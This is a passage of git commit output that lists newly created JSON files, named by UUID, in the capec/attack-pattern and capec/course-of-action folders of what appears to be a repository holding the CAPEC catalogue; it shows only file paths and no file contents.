capec/attack-pattern/attack-pattern--82c00a6c-e591-4b2d-94f9-152a5f0d49ef.json create mode 100644 capec/attack-pattern/attack-pattern--82d6f39b-0888-4a4c-ada5-70206ee62411.json create mode 100644 capec/attack-pattern/attack-pattern--8304a46e-2589-411b-bdb0-db7c3ad7ae06.json create mode 100644 capec/attack-pattern/attack-pattern--83311639-e698-4193-bb1f-b5b90c730078.json create mode 100644 capec/attack-pattern/attack-pattern--835a2a0b-1d06-4d73-a726-edf02da8dd54.json create mode 100644 capec/attack-pattern/attack-pattern--83972adb-a130-4d41-8c1d-f3d603b7311e.json create mode 100644 capec/attack-pattern/attack-pattern--83a895c1-df98-4aa4-be2d-ace0108e64be.json create mode 100644 capec/attack-pattern/attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64.json create mode 100644 capec/attack-pattern/attack-pattern--844d974b-a593-44ec-87b3-9519bdbcca79.json create mode 100644 capec/attack-pattern/attack-pattern--84a1358a-b4c8-43b0-8a2b-62129f3cfcbc.json create mode 100644 capec/attack-pattern/attack-pattern--85138b01-6c08-4c77-aebb-12d28c5c488f.json create mode 100644 capec/attack-pattern/attack-pattern--856aee29-c4f7-4537-a2d3-38895d2fa478.json create mode 100644 capec/attack-pattern/attack-pattern--8610c5ec-7ab2-4f7c-938c-3dc86c0f2b91.json create mode 100644 capec/attack-pattern/attack-pattern--86c7e9d5-09fb-4970-83cd-5eb4690ba5c6.json create mode 100644 capec/attack-pattern/attack-pattern--86e31b64-8521-4fa2-ad2b-3ca2d036d398.json create mode 100644 capec/attack-pattern/attack-pattern--8767e72d-72a4-42d9-a7ec-c03a0776ab7d.json create mode 100644 capec/attack-pattern/attack-pattern--87a0b3d7-010a-4a4e-bead-c7cf82421caf.json create mode 100644 capec/attack-pattern/attack-pattern--88412154-e5dd-4b58-b8d1-c143f7f925e5.json create mode 100644 capec/attack-pattern/attack-pattern--88541d20-3543-40cf-8bcc-73b62f8fbd81.json create mode 100644 capec/attack-pattern/attack-pattern--88e99925-75b4-41a2-998c-5277d6c453f4.json create mode 100644 capec/attack-pattern/attack-pattern--89bd82b0-82da-4cfd-a5ba-d5543dd6529a.json create mode 100644 capec/attack-pattern/attack-pattern--8b552dc6-db57-4f64-a436-cc7577c9eac9.json create mode 100644 capec/attack-pattern/attack-pattern--8b9a21cd-c56d-4322-8fcb-c74a30f3e40d.json create mode 100644 capec/attack-pattern/attack-pattern--8d021592-35be-44cd-a593-0fb47c6d1930.json create mode 100644 capec/attack-pattern/attack-pattern--8e9a80d8-2017-4faa-b83a-8c5b91beead4.json create mode 100644 capec/attack-pattern/attack-pattern--8f1bcb61-cdf4-41ff-a82a-df537363a9a5.json create mode 100644 capec/attack-pattern/attack-pattern--8fbfe1c4-efbb-4bb8-a093-42debf7183f8.json create mode 100644 capec/attack-pattern/attack-pattern--900c4990-9206-447d-ac02-347167d6f41d.json create mode 100644 capec/attack-pattern/attack-pattern--9140cfff-ca18-419a-bb25-7a8b9754139b.json create mode 100644 capec/attack-pattern/attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f.json create mode 100644 capec/attack-pattern/attack-pattern--923fe7b9-55dd-487b-97d0-10501253550e.json create mode 100644 capec/attack-pattern/attack-pattern--92547f87-dd00-493e-bba4-5e22783f1595.json create mode 100644 capec/attack-pattern/attack-pattern--9254e29f-aba9-4bd4-a99d-51822450ed3e.json create mode 100644 capec/attack-pattern/attack-pattern--92bbee8a-8fb6-4348-831c-fe322cb2665f.json create mode 100644 capec/attack-pattern/attack-pattern--9310be04-360c-486d-a5bc-8aadfc32fd39.json create mode 100644 capec/attack-pattern/attack-pattern--9484743d-53ab-4f6f-81e9-cde4ac98307b.json create mode 100644 capec/attack-pattern/attack-pattern--94a15e97-9ac6-4148-ab20-92fb3c4d5d9d.json create mode 100644 capec/attack-pattern/attack-pattern--953e5d44-3432-4d95-a2b3-7dd74ebc6006.json create mode 100644 capec/attack-pattern/attack-pattern--96692315-6211-4eb0-950d-47bbc3575379.json create mode 100644 capec/attack-pattern/attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724.json create mode 100644 capec/attack-pattern/attack-pattern--9923d3b8-3543-49ea-96b8-f49dc83a1a54.json create mode 100644 capec/attack-pattern/attack-pattern--9935655a-bd72-4bca-b424-83e1e27170d7.json create mode 100644 capec/attack-pattern/attack-pattern--9a71d336-cad8-4f78-b86a-0fe3bf92755c.json create mode 100644 capec/attack-pattern/attack-pattern--9a8fa9cc-3a90-4ca1-b298-7195fe8e16b2.json create mode 100644 capec/attack-pattern/attack-pattern--9b0c56c2-e1cf-4830-84ea-bba52af85033.json create mode 100644 capec/attack-pattern/attack-pattern--9c42a1f2-6920-477a-a163-53e2ca9d1c2e.json create mode 100644 capec/attack-pattern/attack-pattern--9d2b2f02-aa84-4ed1-8fb9-e0ee9f5fabc2.json create mode 100644 capec/attack-pattern/attack-pattern--9d3a8f1f-db9b-4608-be5d-71266a270dac.json create mode 100644 capec/attack-pattern/attack-pattern--9e2a4e9f-633b-433e-a854-2705c5df916f.json create mode 100644 capec/attack-pattern/attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb.json create mode 100644 capec/attack-pattern/attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9.json create mode 100644 capec/attack-pattern/attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6.json create mode 100644 capec/attack-pattern/attack-pattern--9eb0b1bd-88c1-4fdd-ac6b-126f037807ce.json create mode 100644 capec/attack-pattern/attack-pattern--9f443ed5-2c16-4d03-8af1-b853ebb05cc4.json create mode 100644 capec/attack-pattern/attack-pattern--9f5fd42d-939f-474e-89af-3e5cde18ef0b.json create mode 100644 capec/attack-pattern/attack-pattern--9f791235-8dca-43f4-aeda-1c58a81f76ae.json create mode 100644 capec/attack-pattern/attack-pattern--9fd50026-2e98-4d6e-9805-e1ed3f71f7f8.json create mode 100644 capec/attack-pattern/attack-pattern--9fe55f74-de34-4b76-b645-a747f47c67b5.json create mode 100644 capec/attack-pattern/attack-pattern--a0553da3-9941-4500-b267-cb7e16a5bc63.json create mode 100644 capec/attack-pattern/attack-pattern--a206f37f-7272-4125-af6c-575e01231af5.json create mode 100644 capec/attack-pattern/attack-pattern--a211b4f0-2565-40ad-a94c-4577ab030e77.json create mode 100644 capec/attack-pattern/attack-pattern--a284d350-0b7b-4a05-a752-2c4135aec8c3.json create mode 100644 capec/attack-pattern/attack-pattern--a2a587c0-5e5a-4d29-bae0-5ef9ac289a1e.json create mode 100644 capec/attack-pattern/attack-pattern--a3161555-44ae-4e28-aac7-537b171ffa52.json create mode 100644 capec/attack-pattern/attack-pattern--a3d8031b-f32f-4ab6-b778-3c06dc20dfb2.json create mode 100644 capec/attack-pattern/attack-pattern--a434020c-1283-4b3d-b150-ce5823790442.json create mode 100644 capec/attack-pattern/attack-pattern--a486810c-f63e-4c74-8ff9-73051a1c1d28.json create mode 100644 capec/attack-pattern/attack-pattern--a511fff6-fe2b-4888-974d-265002b6ddac.json create mode 100644 capec/attack-pattern/attack-pattern--a56904ba-11f7-4f46-be0a-e03fdd712290.json create mode 100644 capec/attack-pattern/attack-pattern--a56d5738-aceb-428c-a9f3-b421d4048426.json create mode 100644 capec/attack-pattern/attack-pattern--a68b40c0-4756-4ed8-bfec-3013dbf1a2cf.json create mode 100644 capec/attack-pattern/attack-pattern--a6ec69a5-b1df-412a-bae3-24edc5ff713c.json create mode 100644 capec/attack-pattern/attack-pattern--a78ebf6a-5b2d-427c-b26a-5fc3aeab3dcd.json create mode 100644 capec/attack-pattern/attack-pattern--a86b02ea-2d3d-48b6-be74-84cc536c3e6e.json create mode 100644 capec/attack-pattern/attack-pattern--a86fe7bb-145b-4f60-b878-0b362c7fb9b0.json create mode 100644 capec/attack-pattern/attack-pattern--a8ad3a6b-76b2-4eaf-9634-33850f24463f.json create mode 100644 capec/attack-pattern/attack-pattern--aa306f00-7aa1-4eb1-a06b-fee572bc0841.json create mode 100644 capec/attack-pattern/attack-pattern--aa81194e-410c-472c-9c6b-00a40d95ca1f.json create mode 100644 capec/attack-pattern/attack-pattern--abd7fa33-c668-4a92-bf4a-944e7baf62af.json create mode 100644 capec/attack-pattern/attack-pattern--ad128bd2-2861-4d14-a127-2401a369742a.json create mode 100644 capec/attack-pattern/attack-pattern--ad790f82-30ed-40e5-b718-ea4dda88b232.json create mode 100644 capec/attack-pattern/attack-pattern--ae163ec7-669f-4796-91a0-9035b8710836.json create mode 100644 capec/attack-pattern/attack-pattern--ae26a24f-24e3-4a3d-a967-473bfbaac369.json create mode 100644 capec/attack-pattern/attack-pattern--ae8e2d1b-fc54-4f25-bd67-3ba98b205cde.json create mode 100644 capec/attack-pattern/attack-pattern--afeca46a-0f28-42f3-9082-9bd39a5cd597.json create mode 100644 capec/attack-pattern/attack-pattern--b0176935-5368-4b4a-9bfd-0f0259bf3309.json create mode 100644 capec/attack-pattern/attack-pattern--b0aa23d7-5fa9-427f-8fb4-7c287b109797.json create mode 100644 capec/attack-pattern/attack-pattern--b14d0051-6f4d-4b7d-b60d-04be433e7592.json create mode 100644 capec/attack-pattern/attack-pattern--b1ff1e07-ccde-4a21-abb3-772e6a3128f3.json create mode 100644 capec/attack-pattern/attack-pattern--b20c5bf0-63ce-4908-996a-673a572420f8.json create mode 100644 capec/attack-pattern/attack-pattern--b25dc912-1c7c-4b73-97b7-8e9ae562979a.json create mode 100644 capec/attack-pattern/attack-pattern--b25dde95-64c2-4432-985b-e3e122866b2e.json create mode 100644 capec/attack-pattern/attack-pattern--b31704a3-c801-44d0-b683-3e8c9cb054c2.json create mode 100644 capec/attack-pattern/attack-pattern--b3416db0-be75-481a-92f0-447262e2aa7e.json create mode 100644 capec/attack-pattern/attack-pattern--b37c8702-c86b-41c9-877c-693488005cac.json create mode 100644 capec/attack-pattern/attack-pattern--b3ddfb17-e193-40c6-97c8-cea72b096dec.json create mode 100644 capec/attack-pattern/attack-pattern--b4167cd3-5fad-4e84-ab0d-e24543675a1b.json create mode 100644 capec/attack-pattern/attack-pattern--b4319874-a526-49a3-b741-b34ad0657c4e.json create mode 100644 capec/attack-pattern/attack-pattern--b44beaa2-63aa-4cbc-b46e-62fd6ea708c5.json create mode 100644 capec/attack-pattern/attack-pattern--b51edcf5-b372-4b85-8155-09c49a9ebddf.json create mode 100644 capec/attack-pattern/attack-pattern--b55ae5bb-98b3-49e0-8a91-1b719e141681.json create mode 100644 capec/attack-pattern/attack-pattern--b55bc5fa-6675-45db-a480-31c86947a2b0.json create mode 100644 capec/attack-pattern/attack-pattern--b5d9986e-3ce3-4e71-b9db-34c715b57579.json create mode 100644 capec/attack-pattern/attack-pattern--b614ab89-0be4-4e89-aa5a-86cab27e743d.json create mode 100644 capec/attack-pattern/attack-pattern--b6de4b50-add8-494c-8fe2-6f2ec52cf7d3.json create mode 100644 capec/attack-pattern/attack-pattern--b7261469-6a57-41f7-9801-2c5d162a3529.json create mode 100644 capec/attack-pattern/attack-pattern--b7cf7ff6-4fc9-45c9-87a1-7bc92cbc05a8.json create mode 100644 capec/attack-pattern/attack-pattern--b8999ae1-3c86-4808-93ca-adce94d9e197.json create mode 100644 capec/attack-pattern/attack-pattern--b8b2ecb9-de19-49b3-a596-0d97839395ec.json create mode 100644 capec/attack-pattern/attack-pattern--b96ebe51-105b-4b19-990a-adeb6336a84a.json create mode 100644 capec/attack-pattern/attack-pattern--b9d78d34-9cd8-473d-8d7c-858c35487b02.json create mode 100644 capec/attack-pattern/attack-pattern--ba3ec386-76ed-49d9-8257-a4c3a772d6c1.json create mode 100644 capec/attack-pattern/attack-pattern--ba8669e5-9f73-4900-9a19-7b24486fe8d6.json create mode 100644 capec/attack-pattern/attack-pattern--babc06ac-cf59-44cd-9f4a-d50771d486df.json create mode 100644 capec/attack-pattern/attack-pattern--bae38550-a769-4b9a-9f24-9325b6c8f0ca.json create mode 100644 capec/attack-pattern/attack-pattern--baf43188-0192-457d-af9d-8ef7bce09a94.json create mode 100644 capec/attack-pattern/attack-pattern--bb06f756-3def-454b-bf89-ee8ed5203179.json create mode 100644 capec/attack-pattern/attack-pattern--bb90461b-f233-44ef-b09e-bc6af67a7796.json create mode 100644 capec/attack-pattern/attack-pattern--bc7b8c08-6c6e-42fd-9c78-be5ed35d8ecb.json create mode 100644 capec/attack-pattern/attack-pattern--bcec667c-66e5-43e5-a836-bbbc36824938.json create mode 100644 capec/attack-pattern/attack-pattern--bd9af4e2-684c-4c12-a724-5df0ff53ac5f.json create mode 100644 capec/attack-pattern/attack-pattern--bda278fb-3efc-4ff9-8b78-465a44374365.json create mode 100644 capec/attack-pattern/attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132.json create mode 100644 capec/attack-pattern/attack-pattern--bded7a75-5d5c-4d00-b403-d840f6631823.json create mode 100644 capec/attack-pattern/attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55.json create mode 100644 capec/attack-pattern/attack-pattern--be7174ed-bde2-48ea-aa7d-bc9a7444efff.json create mode 100644 capec/attack-pattern/attack-pattern--bfd71981-161f-4a77-9ebc-51e9cb290b38.json create mode 100644 capec/attack-pattern/attack-pattern--c03f9135-5567-4f2e-bb34-037eaa403f5f.json create mode 100644 capec/attack-pattern/attack-pattern--c08ad405-5e65-48bb-ad68-5dcb118f0f68.json create mode 100644 capec/attack-pattern/attack-pattern--c09ea7a3-e494-4d13-85cd-edbd5f2d03e4.json create mode 100644 capec/attack-pattern/attack-pattern--c0b51030-b2f4-4d4a-9de0-06dea9a929ba.json create mode 100644 capec/attack-pattern/attack-pattern--c0c8edaa-45cb-4b5d-8927-5d34e5c165ee.json create mode 100644 capec/attack-pattern/attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e.json create mode 100644 capec/attack-pattern/attack-pattern--c15d4233-e0f7-4992-862c-862da665a29f.json create mode 100644 capec/attack-pattern/attack-pattern--c16f9360-53b6-442f-9b6a-cee279944a91.json create mode 100644 capec/attack-pattern/attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e.json create mode 100644 capec/attack-pattern/attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1.json create mode 100644 capec/attack-pattern/attack-pattern--c2badafc-32b2-4509-89e2-cffa64e220f9.json create mode 100644 capec/attack-pattern/attack-pattern--c2ed7aea-f0e3-433b-9d06-453dcd1a21be.json create mode 100644 capec/attack-pattern/attack-pattern--c3ea9757-0ac9-42b7-96df-a6dfe6f85838.json create mode 100644 capec/attack-pattern/attack-pattern--c4a85859-9626-4221-bece-27a5dc5a238f.json create mode 100644 capec/attack-pattern/attack-pattern--c4b5e88c-a86a-466f-a884-545bc54e6b4d.json create mode 100644 capec/attack-pattern/attack-pattern--c4cead7e-9d5e-4551-9100-ddc2098d6f30.json create mode 100644 capec/attack-pattern/attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a.json create mode 100644 capec/attack-pattern/attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42.json create mode 100644 capec/attack-pattern/attack-pattern--c6374b68-b20c-4137-940c-37adee6651fa.json create mode 100644 capec/attack-pattern/attack-pattern--c66c234d-6d33-48c6-a9c5-4113a92ac8a8.json create mode 100644 capec/attack-pattern/attack-pattern--c6b83de3-eda5-445c-8a41-cd0bedd34b2c.json create mode 100644 capec/attack-pattern/attack-pattern--c87d3ca8-4b1a-4711-a2b9-07f413c986ef.json create mode 100644 capec/attack-pattern/attack-pattern--c8c5d454-e4e2-4c3f-9969-6280319b6d25.json create mode 100644 capec/attack-pattern/attack-pattern--c9cacee8-0f24-4a36-8245-d1db21932188.json create mode 100644 capec/attack-pattern/attack-pattern--ca2982ef-3471-481a-ae9d-96c968854e2b.json create mode 100644 capec/attack-pattern/attack-pattern--ca63b113-8230-4bbc-950f-70fc57e70017.json create mode 100644 capec/attack-pattern/attack-pattern--caf7f8c9-fcce-477a-b6af-09052bd6ecca.json create mode 100644 capec/attack-pattern/attack-pattern--cb05a77d-c1ac-41b4-8df1-a4b31cb1fef8.json create mode 100644 capec/attack-pattern/attack-pattern--cb1233cb-0ef8-4ca4-b2e7-ada9e5f175d8.json create mode 100644 capec/attack-pattern/attack-pattern--cc415b90-60a3-4ec4-a8a8-2ede6772cbdf.json create mode 100644 capec/attack-pattern/attack-pattern--cc5ec028-8dd8-4bea-b43e-4a31a64c3cb1.json create mode 100644 capec/attack-pattern/attack-pattern--cd11d31a-89f2-47d8-862f-aed22baed21a.json create mode 100644 capec/attack-pattern/attack-pattern--cd191cc2-fa51-4adc-b1c6-c685e8be1653.json create mode 100644 capec/attack-pattern/attack-pattern--ce52b42b-d355-43fb-92f9-ce114cd3cfdf.json create mode 100644 capec/attack-pattern/attack-pattern--ce67b345-712f-4516-bb1a-555688650caa.json create mode 100644 capec/attack-pattern/attack-pattern--cf09aaa1-441a-4f10-93ce-aea498f9b75a.json create mode 100644 capec/attack-pattern/attack-pattern--cf470563-971d-489e-a0cc-07ef4a7c9e8a.json create mode 100644 capec/attack-pattern/attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8.json create mode 100644 capec/attack-pattern/attack-pattern--d07d20eb-71c3-4416-bbaf-4a63c55230d8.json create mode 100644 capec/attack-pattern/attack-pattern--d08922ff-2566-4d0d-a098-3dfffaea3331.json create mode 100644 capec/attack-pattern/attack-pattern--d0d56d0e-30ee-4e60-9928-f44945c6e95a.json create mode 100644 capec/attack-pattern/attack-pattern--d1885000-ba17-4c2d-a3ea-1e7bc473fe7a.json create mode 100644 capec/attack-pattern/attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537.json create mode 100644 capec/attack-pattern/attack-pattern--d228b96e-9660-4986-8cf5-2a632c9f4baa.json create mode 100644 capec/attack-pattern/attack-pattern--d39afdc9-d913-4686-a5f8-e4ab56eec66e.json create mode 100644 capec/attack-pattern/attack-pattern--d3ed3c67-fd28-49d1-b6a4-8d46b644ad8c.json create mode 100644 capec/attack-pattern/attack-pattern--d454be12-6fcc-4ba0-a730-a07a29f71d36.json create mode 100644 capec/attack-pattern/attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c.json create mode 100644 capec/attack-pattern/attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095.json create mode 100644 capec/attack-pattern/attack-pattern--d4adf927-d379-42f9-9d89-0af5e6aa3f02.json create mode 100644 capec/attack-pattern/attack-pattern--d712e4ad-9f92-4c75-8881-bc52439a588a.json create mode 100644 capec/attack-pattern/attack-pattern--d771faeb-8b5c-40fd-ae05-663a55c61fbf.json create mode 100644 capec/attack-pattern/attack-pattern--d7831c66-164b-4ded-ad02-c8b5a5cd059f.json create mode 100644 capec/attack-pattern/attack-pattern--d7f7daa0-0ea6-48f4-968c-b8e92c62f15a.json create mode 100644 capec/attack-pattern/attack-pattern--d8b7836a-85a5-43ea-bc79-c6303137f74d.json create mode 100644 capec/attack-pattern/attack-pattern--d8d1a4fd-dd67-42ee-a274-9f7c4064283e.json create mode 100644 capec/attack-pattern/attack-pattern--d9a4a5c3-d84c-4e4f-81a2-677ca21084dd.json create mode 100644 capec/attack-pattern/attack-pattern--d9e8064a-a469-49f6-a656-5c344fd61f7b.json create mode 100644 capec/attack-pattern/attack-pattern--da7e08a5-0e7a-43a3-b7b9-91a977e96453.json create mode 100644 capec/attack-pattern/attack-pattern--da89b021-dcf2-4901-9584-c264140320ae.json create mode 100644 capec/attack-pattern/attack-pattern--dbb88eed-046e-4b86-a844-4ab0f9ef21c1.json create mode 100644 capec/attack-pattern/attack-pattern--dbe1fe9c-02c4-48cc-b336-1d9cfdb5e5b8.json create mode 100644 capec/attack-pattern/attack-pattern--dc538968-9ead-4733-b41b-ef83cb2ed62a.json create mode 100644 capec/attack-pattern/attack-pattern--dc7233cb-94c8-40cb-800b-e89e4cfee66e.json create mode 100644 capec/attack-pattern/attack-pattern--dd500c80-274c-4438-9cce-50d96a9bca0c.json create mode 100644 capec/attack-pattern/attack-pattern--dd79f192-635b-43ef-96d2-17548fa8c917.json create mode 100644 capec/attack-pattern/attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d.json create mode 100644 capec/attack-pattern/attack-pattern--dfd3ae57-19df-41b6-b86c-391733a6db86.json create mode 100644 capec/attack-pattern/attack-pattern--e025c9dc-4e29-4c77-a39b-1a448ea12445.json create mode 100644 capec/attack-pattern/attack-pattern--e0f92905-0ef0-4a8b-b495-e21b52b45899.json create mode 100644 capec/attack-pattern/attack-pattern--e2036f8f-24fd-4045-a3a6-f74bd0e5cc0f.json create mode 100644 capec/attack-pattern/attack-pattern--e2589b81-3fc0-4d42-ae48-f6825433bff3.json create mode 100644 capec/attack-pattern/attack-pattern--e301dc35-2869-454b-bcda-8f663dd370fd.json create mode 100644 capec/attack-pattern/attack-pattern--e372df87-d117-476a-907d-0372310c2414.json create mode 100644 capec/attack-pattern/attack-pattern--e3a9da59-fe22-4b97-b493-ffad8011fed6.json create mode 100644 capec/attack-pattern/attack-pattern--e3fe16e1-24d6-49f4-8a4e-ed8a4ded4d53.json create mode 100644 capec/attack-pattern/attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4.json create mode 100644 capec/attack-pattern/attack-pattern--e4c9eec6-e738-4c94-9cba-01f4cabb3239.json create mode 100644 capec/attack-pattern/attack-pattern--e552d833-acbb-47fc-92a8-5156232cb45e.json create mode 100644 capec/attack-pattern/attack-pattern--e55cf19d-be47-487a-acff-69b9f48382c1.json create mode 100644 capec/attack-pattern/attack-pattern--e5addfc2-59ad-479e-babc-715603b5eeb8.json create mode 100644 capec/attack-pattern/attack-pattern--e5e48594-19dd-440e-bd67-fd6d7ec32285.json create mode 100644 capec/attack-pattern/attack-pattern--e6280a4b-a567-415a-800b-6ecb96be15a5.json create mode 100644 capec/attack-pattern/attack-pattern--e6e6beaa-2218-4ec6-8bd7-06ca242bbbe8.json create mode 100644 capec/attack-pattern/attack-pattern--e74ee6db-63e0-427c-be03-ae2792d14c82.json create mode 100644 capec/attack-pattern/attack-pattern--e762106a-5967-4d6c-9887-c06232b6a8af.json create mode 100644 capec/attack-pattern/attack-pattern--e7ba9615-51da-4376-b3b1-3f98ec19223a.json create mode 100644 capec/attack-pattern/attack-pattern--e82e645e-bd7d-477e-b731-8aa85a70b632.json create mode 100644 capec/attack-pattern/attack-pattern--e8fc36a2-3fa6-4dda-a8b2-5354d189e4c1.json create mode 100644 capec/attack-pattern/attack-pattern--ead85fd7-2a41-402e-ab02-e20fad3ceb94.json create mode 100644 capec/attack-pattern/attack-pattern--eb7ef8dd-05d4-4a86-8188-183c7613740e.json create mode 100644 capec/attack-pattern/attack-pattern--eca65a23-cc6f-4bd9-ba21-e64510a66038.json create mode 100644 capec/attack-pattern/attack-pattern--ecbfaa5c-9426-4e2e-9621-4c12bfafbe95.json create mode 100644 capec/attack-pattern/attack-pattern--ed1f6abe-8e7c-4556-a7fc-66a2842201f8.json create mode 100644 capec/attack-pattern/attack-pattern--ed51bcb1-2870-463d-accc-eb68408be81a.json create mode 100644 capec/attack-pattern/attack-pattern--ed57547f-e8aa-466e-8be4-a9ecca5a100a.json create mode 100644 capec/attack-pattern/attack-pattern--ed658e2d-79ca-4953-a56b-3866cce3684a.json create mode 100644 capec/attack-pattern/attack-pattern--ee3a115d-a03f-47db-b64c-d42b8b5006c2.json create mode 100644 capec/attack-pattern/attack-pattern--ee680af9-b2da-44fc-a254-2c2925ffe18e.json create mode 100644 capec/attack-pattern/attack-pattern--ef08989b-f858-4f19-b57e-95a9e5ab11bd.json create mode 100644 capec/attack-pattern/attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1.json create mode 100644 capec/attack-pattern/attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b.json create mode 100644 capec/attack-pattern/attack-pattern--f0bd351b-636b-4299-bf9c-6a27b6301776.json create mode 100644 capec/attack-pattern/attack-pattern--f1d3ef87-d787-4db4-8964-5cdc6d02242b.json create mode 100644 capec/attack-pattern/attack-pattern--f2009992-b316-48ff-8d26-862971791ad3.json create mode 100644 capec/attack-pattern/attack-pattern--f234373b-0d04-4ad3-9c78-ad932c9fa28c.json create mode 100644 capec/attack-pattern/attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af.json create mode 100644 capec/attack-pattern/attack-pattern--f2ee0774-b921-420d-b786-31d5156c671b.json create mode 100644 capec/attack-pattern/attack-pattern--f35584bc-105b-4708-aaae-9c35be199577.json create mode 100644 capec/attack-pattern/attack-pattern--f39ee485-4296-473e-9c38-c1729322fbc3.json create mode 100644 capec/attack-pattern/attack-pattern--f447cb81-c673-42b2-bcdc-d7e8beaf947e.json create mode 100644 capec/attack-pattern/attack-pattern--f44bd96f-9bc0-4343-b744-59a47d18a28d.json create mode 100644 capec/attack-pattern/attack-pattern--f4d4d1a8-c846-4619-89ad-9682367f6f75.json create mode 100644 capec/attack-pattern/attack-pattern--f612c585-96cc-4f6b-9587-a68398da8e7c.json create mode 100644 capec/attack-pattern/attack-pattern--f61a3128-069b-4def-a009-36d2ae15419f.json create mode 100644 capec/attack-pattern/attack-pattern--f6c3e4d5-4ba7-44ed-9558-ef7d5daf433d.json create mode 100644 capec/attack-pattern/attack-pattern--f7a4894c-1535-4ab0-8b9f-2f146b3c97f3.json create mode 100644 capec/attack-pattern/attack-pattern--f7c69d80-10e8-4ddd-a4ad-da248797ba15.json create mode 100644 capec/attack-pattern/attack-pattern--f7ebb8a9-bfde-4217-979b-2a4fa9ed43ed.json create mode 100644 capec/attack-pattern/attack-pattern--f92e04ee-37d8-45fb-a412-691530f2ed85.json create mode 100644 capec/attack-pattern/attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3.json create mode 100644 capec/attack-pattern/attack-pattern--fa6a0a3c-2056-42e4-8e16-cad392c96890.json create mode 100644 capec/attack-pattern/attack-pattern--fabe9a56-1333-417c-af2c-dc3ce7465a0c.json create mode 100644 capec/attack-pattern/attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de.json create mode 100644 capec/attack-pattern/attack-pattern--fb1ce762-688f-4564-bcaf-533020ef079c.json create mode 100644 capec/attack-pattern/attack-pattern--fbad6466-feb9-4ef1-955f-0ebc1dffb88e.json create mode 100644 capec/attack-pattern/attack-pattern--fca5be19-03c1-4d06-8cb8-30687732cc12.json create mode 100644 capec/attack-pattern/attack-pattern--fcbaba82-a505-427a-89f0-0284785340fd.json create mode 100644 capec/attack-pattern/attack-pattern--fce1eeb4-1761-4fba-a388-f45b968adf5a.json create mode 100644 capec/attack-pattern/attack-pattern--fd5e62d0-873c-46f1-bc11-d883bccfa71a.json create mode 100644 capec/attack-pattern/attack-pattern--fe33600f-e2e6-48c2-8033-e571646d5c66.json create mode 100644 capec/attack-pattern/attack-pattern--fe873b5f-c572-46d4-bf82-9521ad00a324.json create mode 100644 capec/attack-pattern/attack-pattern--fede6dfd-28fe-430b-8e83-3954bd33ad25.json create mode 100644 capec/attack-pattern/attack-pattern--ffae340f-2fbb-4ac5-88df-6ac596575620.json create mode 100644 capec/attack-pattern/attack-pattern--ffc91151-400c-4a94-a854-0c7c73d162de.json create mode 100644 capec/course-of-action/course-of-action--005f78f7-e74b-4c18-bbb9-4ef42d88c147.json create mode 100644 capec/course-of-action/course-of-action--016940da-d1ad-4819-b998-04f223a789c4.json create mode 100644 capec/course-of-action/course-of-action--0294f3dd-2a98-44e1-a229-b6928f573805.json create mode 100644 capec/course-of-action/course-of-action--0337ce50-78c7-41df-bfe9-8a1054ed5e4f.json create mode 100644 capec/course-of-action/course-of-action--033ebb89-b975-4cc6-8853-269cb21cd704.json create mode 100644 capec/course-of-action/course-of-action--043a9f6d-144b-439f-84bf-43973bf67ad0.json create mode 100644 capec/course-of-action/course-of-action--04440c70-46f9-4007-9983-336aa6149e9f.json create mode 100644 capec/course-of-action/course-of-action--0487a38e-a332-463c-9f0e-9eeb1b42348a.json create mode 100644 capec/course-of-action/course-of-action--04f7d772-c475-4fa9-b2b8-2b057368ea23.json create mode 100644 capec/course-of-action/course-of-action--056c51b8-7dea-4fae-ba35-723377253083.json create mode 100644 capec/course-of-action/course-of-action--05bdf3fe-3618-4cd4-be74-e241a23c1df8.json create mode 100644 capec/course-of-action/course-of-action--060932fa-a809-49e7-9a4c-05e6c3f99f31.json create mode 100644 capec/course-of-action/course-of-action--061b49b1-f4f3-4237-80b2-fa402ab9054d.json create mode 100644 capec/course-of-action/course-of-action--0698a7f6-d186-4417-93dc-f31e7ca1d81b.json create mode 100644 capec/course-of-action/course-of-action--06ab084b-21a7-425f-8046-f2bcdb3d5d69.json create mode 100644 capec/course-of-action/course-of-action--06cabbce-d4a4-4040-8bb9-9d2d6e4efcd5.json create mode 100644 capec/course-of-action/course-of-action--06ed9958-72eb-4866-9e5e-9bd8c0b19eaf.json create mode 100644 capec/course-of-action/course-of-action--0783cd89-b8b3-4aab-9755-23328a4742a1.json create mode 100644 capec/course-of-action/course-of-action--07a0e5e3-0911-4ece-a705-32ff4a2b913b.json create mode 100644 capec/course-of-action/course-of-action--07c1f1b1-4d7e-47e9-84dc-7fa4fad4772d.json create mode 100644 capec/course-of-action/course-of-action--07e21b68-7c17-480a-88fb-094ddecb93bc.json create mode 100644 capec/course-of-action/course-of-action--083b142c-0281-4135-bf8d-cb4a55bda94e.json create mode 100644 capec/course-of-action/course-of-action--085071c4-d704-47be-85af-ebcd54320914.json create mode 100644 capec/course-of-action/course-of-action--08b77aa6-1eca-464a-9bd0-5286743a84a4.json create mode 100644 capec/course-of-action/course-of-action--093ab972-dc69-4e9d-bafd-38856e65b3d8.json create mode 100644 capec/course-of-action/course-of-action--0a3d01e6-7188-42fb-aa3c-b73906334bce.json create mode 100644 